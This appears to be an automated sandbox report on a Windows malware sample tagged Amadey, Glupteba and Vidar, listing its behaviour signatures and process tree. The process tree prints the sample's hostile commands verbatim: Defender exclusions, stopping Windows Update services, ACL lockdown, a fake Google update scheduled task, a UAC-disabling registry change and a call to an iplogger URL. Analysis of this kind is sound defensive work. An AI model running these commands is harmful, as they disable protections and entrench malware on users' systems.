Malware Analysis Report

2025-01-02 08:25

Sample ID 231005-ffzd9agg4x
Target daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95
SHA256 daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95
Tags
upx amadey fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 dropper evasion loader spyware stealer trojan discovery persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95

Threat Level: Known bad

The file daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95 was found to be: Known bad.

Malicious Activity Summary

upx amadey fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 dropper evasion loader spyware stealer trojan discovery persistence

Glupteba

Fabookie

Amadey

Vidar

Detect Fabookie payload

UAC bypass

Glupteba payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies boot configuration data using bcdedit

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Reads user/profile data of web browsers

UPX packed file

Loads dropped DLL

Drops startup file

Executes dropped EXE

.NET Reactor proctector

Checks installed software on the system

Checks whether UAC is enabled

Enumerates connected drives

Accesses 2FA software files, possible credential harvesting

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Program crash

Enumerates physical storage devices

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Kills process with taskkill

Modifies registry class

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

System policy modification

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-05 04:49

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-05 04:49

Reported

2023-10-05 04:54

Platform

win7-20230831-en

Max time kernel

16s

Max time network

299s

Command Line

"C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A

Vidar

stealer vidar

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QAwjc1JRJ7yjLTfMcjxH2Z6z.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zOjGNBYEg1t2u1KnQmyRozqC.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DElMobLUf1TASdDY6A2lD2lZ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0Mx8xIFrDPnJY7RyL1qWrEgJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KwWxikOG0KnNYBDpW1woYiju.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9vtrapQnDWM0uDcviiJKPoO2.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9Q4juvZVk4TBjvuU04fFcuoT.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uup0gVqyki7L7wpGufbQCxmV.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wLWAlBOVHo0nyjZtqDBu2X9H.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I4pRKYMcRL6yFFCuZS2nzJLo.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\plwoBRHap8pQzIRMrU7ahGbq.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7360021604.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2076 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2076 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2076 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2076 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2668 wrote to memory of 2592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe
PID 2668 wrote to memory of 2592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe
PID 2668 wrote to memory of 2592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe
PID 2668 wrote to memory of 2592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe
PID 2592 wrote to memory of 904 N/A C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2592 wrote to memory of 904 N/A C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2592 wrote to memory of 904 N/A C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2592 wrote to memory of 904 N/A C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2668 wrote to memory of 440 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe
PID 2668 wrote to memory of 440 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe
PID 2668 wrote to memory of 440 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe
PID 2668 wrote to memory of 440 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe
PID 904 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\System32\powercfg.exe
PID 904 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\System32\powercfg.exe
PID 904 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\System32\powercfg.exe
PID 904 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\System32\powercfg.exe
PID 2668 wrote to memory of 1376 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe
PID 2668 wrote to memory of 1376 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe
PID 2668 wrote to memory of 1376 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe
PID 2668 wrote to memory of 1376 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe
PID 904 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 904 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 904 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 904 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 1068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe
PID 2668 wrote to memory of 1068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe
PID 2668 wrote to memory of 1068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe
PID 2668 wrote to memory of 1068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe
PID 2668 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe
PID 2668 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe
PID 2668 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe
PID 2668 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe
PID 2668 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 2668 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe
PID 1028 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 900 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe
PID 2668 wrote to memory of 900 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe
PID 2668 wrote to memory of 900 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe
PID 2668 wrote to memory of 900 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe
PID 1028 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\powercfg.exe
PID 1028 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\powercfg.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe

"C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\wPMt0uRRbpirsjnCi7YBvIL0.exe

"C:\Users\Admin\Pictures\wPMt0uRRbpirsjnCi7YBvIL0.exe"

C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe

"C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe

"C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe

"C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe"

C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

"C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe"

C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe

"C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe

"C:\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe"

C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe

"C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\Pictures\DrE1Usuu459VAYyEgd2xENoZ.exe

"C:\Users\Admin\Pictures\DrE1Usuu459VAYyEgd2xENoZ.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Users\Admin\Pictures\mlhguxx0mid482Aj1auap4iS.exe

"C:\Users\Admin\Pictures\mlhguxx0mid482Aj1auap4iS.exe" --silent --allusers=0

C:\Users\Admin\AppData\Local\Temp\is-HGABT.tmp\3LF4sNEp7nkJEysP3BMkGhDb.tmp

"C:\Users\Admin\AppData\Local\Temp\is-HGABT.tmp\3LF4sNEp7nkJEysP3BMkGhDb.tmp" /SL5="$D0126,491750,408064,C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

"C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {8B26D978-1E26-441F-B45B-4EA5CE0FB424} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\is-2Q7OT.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-2Q7OT.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231005045006.log C:\Windows\Logs\CBS\CbsPersist_20231005045006.cab

C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe

"C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\df-50425-8d8-dbc80-0124fa55bc923\ZHefaezhyxaede.exe

"C:\Users\Admin\AppData\Local\Temp\df-50425-8d8-dbc80-0124fa55bc923\ZHefaezhyxaede.exe"

C:\Users\Admin\AppData\Local\Temp\is-375AR.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-375AR.tmp\lightcleaner.tmp" /SL5="$201EA,833775,56832,C:\Program Files\VideoLAN\EJGUUFMXLS\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 392

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/1ciGA4

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2172 CREDAT:275457 /prefetch:2

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

"C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7360021604.exe"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\7360021604.exe

"C:\Users\Admin\AppData\Local\Temp\7360021604.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7863273423.exe"

C:\Users\Admin\AppData\Local\Temp\7863273423.exe

"C:\Users\Admin\AppData\Local\Temp\7863273423.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2389231104.exe"

C:\Users\Admin\AppData\Local\Temp\2389231104.exe

"C:\Users\Admin\AppData\Local\Temp\2389231104.exe"

C:\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe

"C:\Users\Admin\Pictures\HaqyStptACa6t5JKDui0cAkf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 748

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "tmbTrGgEESOC6ai2Qp4cdXBg.exe" /f & erase "C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "tmbTrGgEESOC6ai2Qp4cdXBg.exe" /f

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\2389231104.exe

C:\Windows\SysWOW64\cmd.exe

